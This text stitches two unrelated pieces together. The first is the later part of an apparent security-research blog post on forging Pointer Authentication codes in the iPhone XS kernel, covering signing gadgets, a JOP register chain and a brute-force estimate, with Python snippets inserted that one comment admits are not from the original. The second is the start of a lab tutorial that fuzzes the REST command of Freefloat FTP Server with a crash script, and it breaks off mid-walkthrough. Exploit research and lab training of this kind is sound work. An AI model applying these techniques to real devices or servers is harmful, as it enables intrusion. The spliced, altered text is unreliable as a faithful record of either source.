While looking at the exception vector for syscall entry, Lel0_synchronous_vector_64, I noticed some additional code referencing bootFlags and setting certain bits of SCTLR_EL1 that are marked as reserved in the ARM standard: ADRP X0, #const_boot_args@PAGE ADD X0, X0, #const_boot_args@PAGEOFF LDR X0, [X0,#(const_boot_args.bootFlags - 0xFFFFFFF0077A21B8)] AND X0, X0, #0x8000000000000000 CBNZ X0, loc_FFFFFFF0079B3320 MRS X0, #0, c1, c0, #0 ;; SCTLR_EL1 TBNZ W0, #0x1F, loc_FFFFFFF0079B3320 ORR X0, X0, #0x80000000 ;; set bit 31 ORR X0, X0, #0x8000000 ;; set bit 27 ORR X0, X0, #0x2000 ;; set bit 13 MSR #0, c1, c0, #0, X0 ;; SCTLR_EL1 Also, these bits are conditionally cleared on exception return: TBNZ W1, #2, loc_FFFFFFF0079B3AE8 ;; SPSR_EL1.M[3:0] & 0x4 ... LDR X2, [X2,#thread.field_460] CBZ X2, loc_FFFFFFF0079B3AE8 ... MRS X0, #0, c1, c0, #0 ;; SCTLR_EL1 AND X0, X0, #0xFFFFFFFF7FFFFFFF ;; clear bit 31 AND X0, X0, #0xFFFFFFFFF7FFFFFF ;; clear bit 27 AND X0, X0, #0xFFFFFFFFFFFFDFFF ;; clear bit 13 MSR #0, c1, c0, #0, X0 ;; SCTLR_EL1 While these bits are documented as reserved (with value 0) by ARM, I did find a reference to one of them in the XNU 4903.221.2 sources, in osfmk/arm64/proc_reg.h: // 13 PACDB_ENABLED AddPACDB and AuthDB functions enabled #define SCTLR_PACDB_ENABLED (1 << 13) This suggested that bit 13 at least is related to enabling PAC for the DB key. Since the only SCTLR_EL1 bits that are both (a) not mentioned in the file and (b) not set automatically via SCTLR_RESERVED are 31, 30, and 27, I speculated that these bits controlled the other PAC keys. (Presumably, leaving the reference to SCTLR_PACDB_ENABLED in the code was an oversight.) My guess is that bit 31 controls PACIA, bit 30 controls PACIB, bit 27 controls PACDA, and bit 13 controls PACDB. 
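Under that guess (and to be clear, only bit 13 is confirmed by the SCTLR_PACDB_ENABLED definition from the XNU sources; bits 31, 30, and 27 are speculation on my part), the masks line up exactly with the ORR immediates in the exception-vector code above:

```python
# Speculative SCTLR_EL1 PAC-enable bits; only PACDB (bit 13) appears
# in the public XNU 4903.221.2 headers.
SCTLR_PACIA_ENABLED = 1 << 31
SCTLR_PACIB_ENABLED = 1 << 30
SCTLR_PACDA_ENABLED = 1 << 27
SCTLR_PACDB_ENABLED = 1 << 13

# The three ORR immediates set in Lel0_synchronous_vector_64; note that
# bit 30 (PACIB, under this guess) is absent from that sequence.
assert SCTLR_PACIA_ENABLED == 0x80000000
assert SCTLR_PACDA_ENABLED == 0x8000000
assert SCTLR_PACDB_ENABLED == 0x2000
```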
To test this theory, I executed the following sequence of PAC instructions in the debugger, both before and after setting the field at offset 0x460 of the current thread: pacia x0, x1 pacib x2, x3 pacda x4, x5 pacdb x6, x7 Before executing these instructions, I set each register Xn to the value 0x11223300 | n. Here's the result before setting field_460, with the PACs highlighted: x0 = 0x001d498011223300 # PACIA x1 = 0x0000000011223301 x2 = 0x0035778011223302 # PACIB x3 = 0x0000000011223303 x4 = 0x0062860011223304 # PACDA x5 = 0x0000000011223305 x6 = 0x001e6c8011223306 # PACDB x7 = 0x0000000011223307 And here's the result after: x0 = 0x0000000011223300 # PACIA x1 = 0x0000000011223301 x2 = 0x0035778011223302 # PACIB x3 = 0x0000000011223303 x4 = 0x0000000011223304 # PACDA x5 = 0x0000000011223305 x6 = 0x0000000011223306 # PACDB x7 = 0x0000000011223307 This seems to confirm our theory: before setting field_460, the PAC instructions worked as expected, but after setting field_460, all except PACIB have been effectively turned into NOPs. Using this fact for exploitation is tricky, since overwriting field_460 in a kernel thread does not seem to disable PAC in that thread due to additional checks. Nonetheless, the existence of these PAC-enable bits in SCTLR_EL1 was interesting in its own right. The (non-)existence of signing gadgets At this point, since we have no systematic weaknesses against Apple's more robust design, we're looking for a signing gadget usable only via read/write. That means we're looking for a sequence of code that will read a pointer from memory, sign it, and write it back to memory. But we can't yet call arbitrary kernel addresses, so we also need to ensure that this code path is actually triggerable, either during the course of normal kernel operation, or by using our iokit_user_client_trap() call primitive to call a kernel function to which there already exists a PACIZA'd pointer. 
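We can turn the before/after comparison into a simple predicate: for a userspace pointer (bit 55 clear), any nonzero bit above the VA range means a PAC is present. A sketch, assuming a 39-bit VA size purely for illustration:

```python
def has_pac(ptr, va_bits=39):
    """True if a userspace pointer carries a PAC in its upper bits.
    The 39-bit VA size is an assumption for these sample values."""
    return (ptr >> va_bits) != 0

# PACIA, PACIB, PACDA, PACDB results before setting field_460...
before = [0x001D498011223300, 0x0035778011223302,
          0x0062860011223304, 0x001E6C8011223306]
# ...and after: only the PACIB result still carries a PAC.
after = [0x0000000011223300, 0x0035778011223302,
         0x0000000011223304, 0x0000000011223306]
```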
Apple has clearly tried to scrub the kernelcache of any obvious signing gadgets. All occurrences of the PACIA instruction are either unusable or wrapped by code that switches to the userspace PAC keys (via S3_4_C15_C0_4), so there's no way we can convince the kernel to perform a PACIA forgery using only read/write. This left just PACIZA. While there were many more occurrences of the PACIZA instruction, most of them were useless since the result wasn't written to memory. Additionally, gadgets that actually did load and store the pointer were almost always preceded by AUTIA, which would fail if the pointer we were signing didn't already have a valid PAC:

LDR X10, [X9,#0x30]!
CBNZ X19, loc_FFFFFFF007EBD330
CBZ X10, loc_FFFFFFF007EBD330
MOV X19, #0
MOV X11, X9
MOVK X11, #0x14EF,LSL#48
AUTIA X10, X11
PACIZA X10
STR X10, [X9]

Thus, it appeared I was out of luck.

The fourth weakness

After giving up on signing gadgets and pursuing a few other dead ends, I eventually wondered: What would actually happen if PACIZA was used to sign an invalid pointer validated by AUTIA? I'd assumed that such a pointer would be useless, but I decided to look at the ARM pseudocode to see what would actually happen. To my surprise, the standard revealed a funny interaction between AUTIA and PACIZA. When AUTIA finds that an authenticated pointer's PAC doesn't match the expected value, it corrupts the pointer by inserting an error code into the pointer's extension bits:

// Auth()
// ======
// Restores the upper bits of the address to be all zeros or all ones (based on
// the value of bit[55]) and computes and checks the pointer authentication
// code. If the check passes, then the restored address is returned. If the
// check fails, the second-top and third-top bits of the extension bits in the
// pointer authentication code field are corrupted to ensure that accessing the
// address will give a translation fault.
bits(64) Auth(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data, bit keynumber)
    bits(64) PAC;
    bits(64) result;
    bits(64) original_ptr;
    bits(2) error_code;
    bits(64) extfield;
    // Reconstruct the extension field used of adding the PAC to the pointer
    boolean tbi = CalculateTBI(ptr, data);
    integer bottom_PAC_bit = CalculateBottomPACBit(ptr<55>);
    extfield = Replicate(ptr<55>, 64);
    if tbi then
        ...
    else
        original_ptr = extfield<64-bottom_PAC_bit-1:0>:ptr<bottom_PAC_bit-1:0>;
    PAC = ComputePAC(original_ptr, modifier, K<127:64>, K<63:0>);
    // Check pointer authentication code
    if tbi then
        ...
    else
        if ((PAC<54:bottom_PAC_bit> == ptr<54:bottom_PAC_bit>)
                && (PAC<63:56> == ptr<63:56>)) then
            result = original_ptr;
        else
            error_code = keynumber:NOT(keynumber);
            result = original_ptr<63>:error_code:original_ptr<60:0>;
    return result;

Meanwhile, when PACIZA is adding a PAC to a pointer, it actually signs the pointer with corrected extension bits, and then corrupts the PAC if the extension bits were originally invalid. From the pseudocode for AddPAC() above:

ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>);
// Check if the ptr has good extension bits and corrupt the pointer
// authentication code if not;
if !IsZero(ptr<top_bit:bottom_PAC_bit>) && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then
    PAC<top_bit-1> = NOT(PAC<top_bit-1>);

Critically, PAC* instructions will corrupt the PAC of a pointer with invalid extension bits by flipping a single bit of the PAC. While this will certainly invalidate the PAC, this also means that the true PAC can be reconstructed if we can read out the value of a PAC*-forgery on a pointer produced by an AUT* instruction! So sequences like the one above that consist of an AUTIA followed by a PACIZA can be used as signing gadgets even if we don't have a validly signed pointer to begin with: we just have to flip a single bit in the forged PAC.
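To convince ourselves this works, we can simulate the Auth()/AddPAC() interaction with a toy PAC function. The model below assumes bottom_PAC_bit is 39 and TBI is off for kernel pointers (so top_bit is 63 and the corrupted PAC bit is bit 62); the hash is just a stand-in for QARMA-64, but the error-code insertion and extension-bit check follow the pseudocode:

```python
BOTTOM = 39
MASK64 = (1 << 64) - 1
EXT_MASK = ~((1 << BOTTOM) - 1) & MASK64          # bits 63:39
PAC_MASK = EXT_MASK & ~((1 << 63) | (1 << 55))    # PAC field; bit 55 is spared
                                                  # so Auth() can restore the EL

def toy_pac(ptr, modifier):
    """Deterministic stand-in for ComputePAC()/QARMA-64."""
    h = (ptr ^ (modifier * 0x9E3779B97F4A7C15)) & MASK64
    h = ((h ^ (h >> 29)) * 0xBF58476D1CE4E5B9) & MASK64
    return (h ^ (h >> 32)) & PAC_MASK

def canonical(ptr):
    return ptr | EXT_MASK if ptr & (1 << 55) else ptr & ~EXT_MASK

def add_pac(ptr, modifier):
    """AddPAC(): sign the corrected pointer, flipping PAC bit 62
    (top_bit-1) if the extension bits were invalid."""
    pac = toy_pac(canonical(ptr), modifier)
    if (ptr & EXT_MASK) not in (0, EXT_MASK):
        pac ^= 1 << 62
    return (ptr & ~PAC_MASK) | pac

def auth(ptr, modifier, keynumber=0):
    """Auth(): on a PAC mismatch, write error_code = keynumber:NOT(keynumber)
    into bits 62:61 of the restored pointer."""
    orig = canonical(ptr)
    if (ptr & PAC_MASK) == toy_pac(orig, modifier):
        return orig
    error_code = (keynumber << 1) | (1 - keynumber)
    return (orig & ~(0b11 << 61)) | (error_code << 61)

kptr = 0xFFFFFFF007004000                # unsigned kernel pointer, valid ext bits
genuine = add_pac(kptr, 0)               # what a real PACIZA of kptr produces
gadget = add_pac(auth(kptr, 0x1234), 0)  # the AUTIA-then-PACIZA gadget
assert gadget != genuine                 # the stored forgery has a corrupted PAC,
assert gadget ^ (1 << 62) == genuine     # but flipping one bit recovers it
```

The final two assertions are the whole attack in miniature: the value the gadget stores to memory is wrong, but it's wrong in exactly one predictable bit.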
A complete A-key forgery strategy for 16C50 With the existence of a single PACIZA signing gadget, we can begin our construction of a complete forgery strategy for the A keys on A12 devices running build 16C50. Stage 1: PACIZA-forgery A bit of sleuthing reveals that the gadget we found is part of the function sysctl_unregister_oid(), which is responsible for unregistering a sysctl_oid struct from the global sysctl tree. (Once again, this function does not have any PAC-related code in the public sources, but these operations are present on PAC-enabled devices.) Here's a listing of the relevant parts of this function from IDA: void sysctl_unregister_oid(sysctl_oid *oidp) { sysctl_oid *removed_oidp = NULL; sysctl_oid *old_oidp = NULL; BOOL have_old_oidp; void **handler_field; void *handler; uint64_t context; ... if ( !(oidp->oid_kind & 0x400000) ) // Don't enter this if { ... } if ( oidp->oid_version != 1 ) // Don't enter this if { ... } sysctl_oid *first_sibling = oidp->oid_parent->first; if ( first_sibling == oidp ) // Enter this if { removed_oidp = NULL; old_oidp = oidp; oidp->oid_parent->first = old_oidp->oid_link; have_old_oidp = 1; } else { ... } handler_field = &old_oidp->oid_handler; handler = old_oidp->oid_handler; if ( removed_oidp || !handler ) // Take the else { ... } else { removed_oidp = NULL; context = (0x14EF << 48) | ((uint64_t)handler_field & 0xFFFFFFFFFFFF); *handler_field = ptrauth_sign_unauthenticated( ptrauth_auth_function(handler, ptrauth_key_asia, &context), ptrauth_key_asia, 0); ... } ... } If we can get this function called with a crafted sysctl_oid that causes the indicated path to be taken, we should be able to forge arbitrary PACIZA pointers. There aren't any existing global PACIZA'd pointers to this function, so we can't call it directly using our iokit_user_client_trap() primitive, but as luck would have it, there are several global PACIZA'd function pointers that themselves call into it. 
This is because several kernel extensions register sysctls that they need to unregister before they're unloaded; these kexts often have a module termination function that calls sysctl_unregister_oid(), and the kmod_info struct describing the kext contains a PACIZA'd pointer to the module termination function. The best candidate I could find was l2tp_domain_module_stop(), which is part of the com.apple.nke.l2tp kext. This function will perform some deinitialization work before calling sysctl_unregister_oid() on the global sysctl__net_ppp_l2tp object. Thus, we can PACIZA-sign an arbitrary pointer by overwriting the contents of sysctl__net_ppp_l2tp, calling l2tp_domain_module_stop() via the existing global PACIZA'd pointer, and then reading out sysctl__net_ppp_l2tp's oid_handler field and flipping bit 62.

Stage 2: PACIA/PACDA forgery

While this lets us PACIZA-forge any pointer we want, it'd be nice to be able to perform PACIA/PACDA forgeries as well, since then we could implement the full bypass described in the section "Finding an entry point for kernel code execution". To do that, I next looked into whether our PACIZA primitive could turn any of the PACIA instructions in the kernelcache into viable signing gadgets. The most likely candidate for both PACIA and PACDA was an unknown function sub_FFFFFFF007B66C48, which contains the following instruction sequence:

MRS X9, #4, c15, c0, #4 ; S3_4_C15_C0_4
AND X9, X9, #0xFFFFFFFFFFFFFFFB
MSR #4, c15, c0, #4, X9 ; S3_4_C15_C0_4
ISB
LDR X9, [X2,#0x100]
CBZ X9, loc_FFFFFFF007B66D24
MOV W10, #0x7481
PACIA X9, X10
STR X9, [X2,#0x100]
...
LDR X9, [X2,#0xF8]
CBZ X9, loc_FFFFFFF007B66D54
MOV W10, #0xCBED
PACDA X9, X10
STR X9, [X2,#0xF8]
...
MRS X9, #4, c15, c0, #4 ; S3_4_C15_C0_4
ORR X9, X9, #4
MSR #4, c15, c0, #4, X9 ; S3_4_C15_C0_4
ISB
...
PACIBSP
STP X20, X19, [SP,#var_20]!
...
;; Function body (mostly harmless)
LDP     X20, X19, [SP+0x20+var_20],#0x20
AUTIBSP
MOV     W0, #0
RET

What makes sub_FFFFFFF007B66C48 a good candidate is that the PACIA/PACDA instructions occur before the stack frame is set up. Ordinarily, calling into the middle of a function will cause problems when the function returns, since the function's epilogue will tear down a frame that was never set up. But since this function's stack frame is set up after our desired entry points, we can use our kernel call primitive to jump directly to these instructions without causing any problems.

Of course, we still have another issue: the PACIA and PACDA instructions use registers X9 and X10, while our kernel call primitive based on iokit_user_client_trap() only gives us control of registers X1 through X6. We'll need to figure out how to get the values we want into the appropriate registers. In fact, we already found a solution to this very problem earlier: JOP gadgets.

Searching through the kernelcache, just three kexts seem to hold the vast majority of non-PAC'd indirect branches: FairPlayIOKit, LSKDIOKit, and LSKDIOKitMSE. These kexts even stand out in IDA's navigator bar as islands of red in a sea of blue, since IDA cannot create functions out of many of the instructions in these kexts. It seems that these kexts use some sort of obfuscation to hide control flow and make reverse engineering more difficult. Many jumps in this code are performed indirectly through registers. Unfortunately, in this case the obfuscation actually makes our job as attackers easier, since it gives us a plethora of useful JOP gadgets not protected by PAC.

For our specific use case, we have control of PC and X1 through X6, and we're trying to set X2 to some writable memory region, X9 to the pointer we want to sign, and X10 to the signing context, before jumping to the signing gadget.
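Before committing to concrete gadgets, the required register shuffle can be prototyped as pure data movement. The toy trace below is my own sketch (not tooling from the article): it models each gadget as a register-to-register move and checks that, by the time control reaches the signing gadget, X9 holds the pointer, X10 the context, and X2 the scratch buffer:

```python
def trace_shuffle(pointer, context, buffer_addr):
    # Initial state reachable through iokit_user_client_trap(): we control
    # X1-X6; X1/X5/X6 would hold the (symbolic) gadget addresses.
    regs = {"X2": buffer_addr, "X3": context, "X4": pointer}
    regs["X0"] = regs["X4"]   # gadget 1: MOV X0, X4 ; BR X5
    regs["X9"] = regs["X0"]   # gadget 2: MOV X9, X0 ; BR X1
    regs["X10"] = regs["X3"]  # gadget 3: MOV X10, X3 ; BR X6
    # Signing gadget now sees: PACIA X9, X10 ; STR X9, [X2,#0x100]
    return regs["X9"], regs["X10"], regs["X2"]

print(trace_shuffle(0x41414141, 0x14EF, 0xF000))
```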
I eventually settled on executing the following JOP program to accomplish this:

X1 = MOV_X10_X3__BR_X6
X2 = KERNEL_BUFFER
X3 = CONTEXT
X4 = POINTER
X5 = MOV_X9_X0__BR_X1
X6 = PACIA_X9_X10__STR_X9_X2_100

MOV     X0, X4
BR      X5

MOV     X9, X0
BR      X1

MOV     X10, X3
BR      X6

PACIA   X9, X10
STR     X9, [X2,#0x100]
...

And with that, we now have a complete bypass strategy that allows us to forge arbitrary PAC signatures using the A keys.

Timeline

After sharing my original kernel read/write exploit on December 18, 2018, I reported the proof-of-concept PAC bypass built on top of voucher_swap on December 30. This POC could produce arbitrary A-key PAC forgeries and call arbitrary kernel functions with 7 arguments, just like on non-PAC devices. Apple quickly responded suggesting that the latest iOS 12.1.3 beta, build 16D5032a, should mitigate the issue. As this build also fixed the voucher_swap bug, I couldn't test this directly, but I did inspect the kernelcache manually and found that Apple had mitigated the sysctl_unregister_oid() gadget used to produce the first PACIZA forgery. This build was released on December 19, near the beginning of my research into PAC and long before I reported the bypass to Apple. Thus, like the case with the voucher_swap bug, I suspect that another researcher found and reported this issue first.

Apple's fix

In order to fix the sysctl_unregister_oid() gadget (and other AUTIA-PACIA gadgets), Apple has added a few instructions to ensure that if the AUTIA fails, then the resulting invalid pointer will be used instead of the result of PACIZA:

LDR     X10, [X9,#0x30]!
;; X10 = old_oidp->oid_handler
CBNZ    X19, loc_FFFFFFF007EBD4A0
CBZ     X10, loc_FFFFFFF007EBD4A0
MOV     X19, #0
MOV     X11, X9                  ;; X11 = &old_oidp->oid_handler
MOVK    X11, #0x14EF,LSL#48      ;; X11 = 14EF`&oid_handler
MOV     X12, X10                 ;; X12 = oid_handler
AUTIA   X12, X11                 ;; X12 = AUTIA(handler, 14EF`&handler)
XPACI   X10                      ;; X10 = XPAC(handler)
CMP     X12, X10
PACIZA  X10                      ;; X10 = PACIZA(XPAC(handler))
CSEL    X10, X10, X12, EQ        ;; X10 = (PAC_valid ? PACIZA : AUTIA)
STR     X10, [X9]

With this change, we can no longer PACIZA-forge a pointer unless we already have a PACIA forgery with a specific context.

Brute-force strategies

While this does mitigate the fast, straightforward strategy outlined above, with enough time it is still susceptible to brute forcing. Now, I couldn't test this explicitly without an exploit for iOS 12.1.3, but I was able to simulate how long it might take using my exploit on iOS 12.1.2. The problem is that even though we don't have an existing PACIA forgery for the pointer we want to PACIZA-forge, we can use our kernel call primitive to execute this gadget repeatedly with different guesses for the valid PAC. Unlike most other instances in which authenticated pointers are used, guessing incorrectly here won't actually trigger a panic: we can just read out the result to see whether we guessed correctly (in which case the oid_handler field will have a PAC added) or incorrectly (in which case oid_handler will look like the result of a failed AUTIA).

Looking back at the list of PAC'd pointers generated in my very first experiment in the subsection "Observing runtime behavior", I compared the extension bits of all the pointers to determine that the PAC was masked into the bits 0xff7fff8000000000. This means the A12 is using a 24-bit PAC, or about 16 million possibilities. In my experiments, I found that invoking l2tp_domain_module_stop() and l2tp_domain_module_start() 256 times took about 13.2 milliseconds.
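Plugging the observed numbers in gives a ballpark for the brute force (back-of-the-envelope only; real timings will vary by device):

```python
PAC_MASK = 0xff7fff8000000000      # extension bits holding the PAC on the A12
pac_bits = bin(PAC_MASK).count("1")
print(pac_bits)                    # 24 -> about 16.8M possible PAC values

seconds_per_guess = 13.2e-3 / 256  # 256 module stop/start cycles took ~13.2 ms
total_minutes = (2 ** pac_bits) * seconds_per_guess / 60
print(round(total_minutes, 1))     # ~14.4 minutes for an exhaustive search
```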
Thus, exhaustively checking all 16 million possible PACs should take around 15 minutes. And unless there were other changes I didn't notice, once a single PACIZA forgery is produced, the rest of the A-key bypass strategy should still be possible. (Initializing/deinitializing the module more than about 4096 times started to produce noticeable slowdowns; I didn't identify the source of this slowness, but I do suspect that with effort it should be possible to work around it.)

Conclusion

In this post we put Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS under the microscope, describing observed behavior, theorizing about how deviations from the ARM reference might be implemented under the hood, and analyzing the system for weaknesses that would allow a kernel attacker with read/write capabilities to forge PACs for arbitrary pointers. This analysis culminated with a complete bypass strategy and proof-of-concept implementation that allows the attacker to perform arbitrary A-key forgeries on an iPhone XS running iOS 12.1.2. Such a bypass is sufficient for achieving arbitrary kernel code execution through JOP. This strategy was partially mitigated with the release of iOS 12.1.3 beta 16D5032a, although there are indications that it might still be possible to bypass the mitigation via a brute-force approach.

Despite these flaws, PAC remains a solid and worthwhile mitigation. Apple's hardening of PAC in the A12 SoC, which was clearly designed to protect against kernel attackers with read/write, meant that I did not find a systematic break in the design and had to rely on signing gadgets, which are easy to patch via software. As with any complex new mitigation, loopholes are not uncommon in the first few iterations.
However, given the fragility of the current bypass technique (relying on, among other things, the single IOUserClient class that allows us to overwrite its IOExternalTrap, one of a very small number of usable PACIZA gadgets, and a handful of non-PAC'd JOP gadgets introduced by obfuscation), I believe it's possible for Apple to harden their implementation to the point that strong forgery bypasses become rare. Furthermore, PAC shows promise as a tool to make data-only kernel attacks trickier and less powerful. For example, I could see Apple adding something akin to a __security_critical attribute that enables PAC for C pointers that are especially prone to being hijacked during exploits, such as ipc_port's ip_kobject field. Such a mitigation wouldn't end any bug classes, since sophisticated attackers could find other ways of leveraging vulnerabilities into kernel read/write primitives, but it would raise the bar and make simple exploit strategies like those used in voucher_swap much harder (and hopefully less reliable) to pull off.

Posted by Ben at 11:25 AM

Source: https://googleprojectzero.blogspot.com/2019/02/examining-pointer-authentication-on.html
-
Introduction to Network Protocol Fuzzing & Buffer Overflow Exploitation

Jan 29, 2019 by Joey Lane
Tags: Buffer Overflow / OSCP / OSCE / Fuzzing / Exploit Development

In this article we will introduce the fundamentals of discovering and exploiting buffer overflow vulnerabilities in Windows applications. If you have never written an exploit before, this may seem a bit intimidating at first. Perhaps you are pursuing your OSCP certification and have just been introduced to the concept of buffer overflow. I assure you this is not as difficult as it seems. If you dedicate a little bit of time to it, you can learn it!

Software Requirements

A virtualization platform (Virtualbox, VMware, etc.)
A Windows XP, Vista, or 7 virtual machine (32-bit)
A Kali Linux virtual machine (32-bit)
Immunity Debugger (https://www.immunityinc.com/products/debugger/)
Wireshark
Python 2.7
Mona.py (https://github.com/corelan/mona)
Metasploit Framework
Freefloat FTP Server

During this exercise we will walk through the process of discovering and exploiting a vulnerability in the Freefloat FTP Server application. We are going to use two virtual machines hosted on a private network to do this. We will be hosting the vulnerable application in a Windows XP virtual machine, and attacking from a Kali Linux virtual machine. In our Windows VM we will be using Immunity Debugger and 'mona.py' to closely examine the Freefloat FTP Server application. In our Kali Linux VM we will be working with Python, Wireshark, and Metasploit Framework to fuzz the FTP service and develop a working exploit.

Concepts and Terminology

Before we get started we need to cover some of the basic concepts and terminology we will be exploring. During this exercise you will see the words fuzzing, buffer overflow, assembly code, and shellcode used frequently. You do not need to be an expert in any of these concepts to follow along, however a basic understanding of each one is necessary to complete the exercise.
Fuzzing

Wikipedia – Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. Typically, fuzzers are used to test programs that take structured inputs. This structure is specified, e.g., in a file format or protocol and distinguishes valid from invalid input. An effective fuzzer generates semi-valid inputs that are "valid enough" in that they are not directly rejected by the parser, but do create unexpected behaviors deeper in the program and are "invalid enough" to expose corner cases that have not been properly dealt with.

Buffer Overflow

Wikipedia – In information security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes. Exploiting the behavior of a buffer overflow is a well-known security exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined.
By sending in data designed to cause a buffer overflow, it is possible to write into areas known to hold executable code and replace it with malicious code, or to selectively overwrite data pertaining to the program's state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread in operating system (OS) code, so it is possible to make attacks that perform privilege escalation and gain unlimited access to the computer's resources. The famed Morris worm in 1988 used this as one of its attack techniques. Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows, but requires additional code and processing time. Modern operating systems use a variety of techniques to combat malicious buffer overflows, notably by randomizing the layout of memory, or deliberately leaving space between buffers and looking for actions that write into those areas ("canaries").

Shellcode

Wikipedia – In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.
Assembly Code

Wikipedia – An assembly (or assembler) language, often abbreviated asm, is any low-level programming language in which there is a very strong correspondence between the program's statements and the architecture's machine code instructions. Each assembly language is specific to a particular computer architecture and operating system. In contrast, most high-level programming languages are generally portable across multiple architectures but require interpreting or compiling. Assembly language may also be called symbolic machine code.

Understanding the Basics

In-depth coverage of assembly code is way out of scope for this article, however there are a few basic concepts you should be familiar with when tackling this exercise. Below is a quick overview of some common CPU registers that we will be working with:

EIP – Register that contains the memory address of the next instruction to be executed by the program. EIP tells the CPU what to do next.
ESP – Register pointing to the top of the stack at any time.
EBP – Stays consistent throughout a function so that it can be used as a placeholder to keep track of local variables and parameters.
EAX – "Accumulator", normally used for arithmetic operations.
EBX – Base register.
ECX – "Counter", normally used to hold a loop index.
EDX – Data register.
ESI/EDI – Used by memory transfer instructions.

There are tons of tutorials online if you find you need more to follow along. If you want to take a dive into assembly, I highly recommend the Pentester Academy course "x86 Assembly Language and Shellcoding on Linux" by Vivek Ramachandran. It is worth every penny. For now, we just need to understand that EIP is responsible for controlling program execution, and ESP is where we will be storing our shellcode during exploitation.

Discovering the Vulnerability

Let's fire up our two virtual machines and get started! To follow along, you will need to ensure that you have the following software installed in each VM.
To make things easier to follow you may want to configure each machine to use the following IP addresses, however this is not required. You can simply adjust the IPs in the exercise as you go along if you'd like.

Windows VM / IP Address: 172.16.183.129
Freefloat FTP Server
Immunity Debugger
mona.py

Kali Linux VM / IP Address: 172.16.183.131
Wireshark
Python 2.7
Metasploit Framework

Network Protocol Fuzzing

Let's assume that we know nothing at all about the application we are testing. How do we go about finding a vulnerability in a program that we know nothing about? We could try to find the source code online and review it, but what if the source code is not available? In that case we can resort to fuzz testing the application. Let's start off by launching the Freefloat FTP Server in our Windows virtual machine as normal. We can already see that this is a very basic FTP server application. It lacks many of the configuration options that we would expect from an FTP service. This application will accept any username/password combination when logging in, as it is designed to be simple.

We will be attacking the application across the network, so let's start off by simply connecting to the FTP server from our Kali Linux machine and taking a look at the network traffic. Launch Wireshark and start listening for traffic on the 'eth0' interface. To eliminate some unnecessary noise, we will apply 'ip.addr == 172.16.183.129' as a filter so that we only see traffic going to the Windows machine. We can authenticate with any credentials we like, but let's keep it simple by using the username 'test' and the password 'test'. Now let's examine the traffic in Wireshark so that we can get an idea of how the FTP client talks to the remote FTP server. We will right click on the first line and select "Follow TCP Stream" in order to view the communication between the client and server. The text in blue was sent from the server to the client.
The text in red was sent from the client to the server. As we can see, when we connected to the FTP server several commands were sent by our client to establish the connection. Based on the responses we got from the server, it did not appear to understand all of the commands that we sent. The commands it did not understand appear to have been handled gracefully, as we were still able to establish a connection. The following commands appear to be supported based on the information we have so far:

USER
PASS
TYPE
PWD
CWD
PASV
PORT
LIST

At this point we could begin writing a script to fuzz each of these commands to see if we can find a vulnerability, however this is NOT a full list of all the commands supported by the FTP protocol. We could technically continue interacting with the FTP server to get an idea of what other commands are available, but this could take a long time. Instead we will save time by looking at the official RFC (Request for Comments) published for the FTP protocol. Reading the RFCs is very handy when testing network protocols, as they essentially act as a user manual for us to understand what each command does. This will not only help us better understand how the FTP protocol works, but it will save us time manually looking for commands to fuzz test. You can find the official RFC for FTP at the following link:

FILE TRANSFER PROTOCOL (FTP) RFC – https://tools.ietf.org/html/rfc959

If we were doing a thorough security assessment of the Freefloat FTP Server application, we would want to fuzz every single command listed in the RFC. To save us some time here, we are going to focus on the REST command. From page 31 in the FTP RFC:

RESTART (REST): The argument field represents the server marker at which file transfer is to be restarted. This command does not cause file transfer but skips over the file to the specified data checkpoint.
This command shall be immediately followed by the appropriate FTP service command which shall cause file transfer to resume.

Let's write a simple python script to connect to the FTP server and fuzz test the REST command. We'll name this script 'fuzz.py':

import sys
from socket import *

ip = "172.16.183.129"
port = 21
buf = "\x41" * 1000

print "[+] Connecting..."
s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()
print "[+] Done."

If we break down the above script, we see that it will establish a connection to the FTP server, and then issue the USER command with the value 'test\r\n'. The '\r\n' piece is what submits the input to the server. Next it will issue the PASS command. Once it has authenticated to the server, it will issue the REST command and specify 1000 'A's as our input. This is likely not what the application expects to receive, so let's see if it gracefully handles our input or crashes.

As we can see in our Windows VM, the application has crashed, indicating that the program did not gracefully handle the input we supplied to the REST command. This means that we may be looking at a buffer overflow vulnerability in that command. It is important to note that not all application errors and crashes necessarily indicate a vulnerability. In order to determine if this particular bug can be exploited, we will want to explore the crash a little closer in Immunity Debugger.

Determining if the bug is exploitable

Let's launch Immunity Debugger and reopen the Freefloat FTP Server application. This will give us the ability to watch the flow of execution and determine if the bug we discovered is actually an exploitable vulnerability. At first glance this is a LOT of information to take in. Don't worry, it will start to make more sense as we go through the exercise. Take note of the box on the upper right hand side.
